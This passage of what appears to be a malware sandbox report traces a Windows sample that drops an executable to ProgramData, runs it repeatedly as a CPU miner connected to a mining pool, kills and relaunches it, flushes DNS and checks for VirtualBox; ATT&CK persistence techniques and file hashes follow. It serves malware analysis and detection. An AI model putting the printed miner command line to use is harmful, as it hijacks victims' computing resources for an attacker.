C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:5028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:5736 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5864
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5788
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:5788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6020
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵PID:6168
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:6220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6400
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6348
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6480
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6716
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6652
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6784
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵PID:6900
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:6952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7084
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7020
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7164
-
-
C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exeC:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe1⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:5920
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD523d84a7ed2e8e76d0a13197b74913654
SHA123d04ba674bafbad225243dc81ce7eccd744a35a
SHA256ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c
-
Filesize
3.1MB
MD57b2f170698522cd844e0423252ad36c1
SHA1303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA2565214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA5127155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa
-
Filesize
85KB
MD544bd764a941ca97a85c301566835cf22
SHA12e4b3df2a6b26cc97865b392d70cb495496e6f83
SHA2561df8a059c13cf1604cca880ad646b76e8a18a3860437d84ec2b6b4e36f61c3e1
SHA5122db04d788646137be8d545138f67f6ce954791bb6b3b2d0221c22e85b8a86b673329452c1df6ed062df569fd80aa97e5e7c77c747ead15b0afae057a814882be
-
Filesize
71KB
MD574024b2ab5376c5471c2597ea721ad0d
SHA1b0f4e38d3c99440b921486e240ccbde82fa57e2b
SHA25684b0e67582f7d9f744896f11b7c68ce1ae57dc9f0019b8cd2a470976f0bbb432
SHA5129949ee5a5fa212b7c9ff1ed2f00a10d5ba75945f5ae092461b4cf0cbfd1275ca05c71e4e15ebeccc4665e62be07cb04982132d08ff40d985454b17804fedc805
-
C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
Filesize9.0MB
MD5a2af48a018c65d34b445bd35bdd1b597
SHA176daedc184a0cb9a717fc49f86a57b5baed0a35c
SHA256d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60
SHA512d8def07a8accdb65b6b9dfc3168981b600a78310ec06cb626fcd000e7bcc4627ff5be7fc9f26992838226d84982ddd470d9ac89e041727e72b738a61bec61319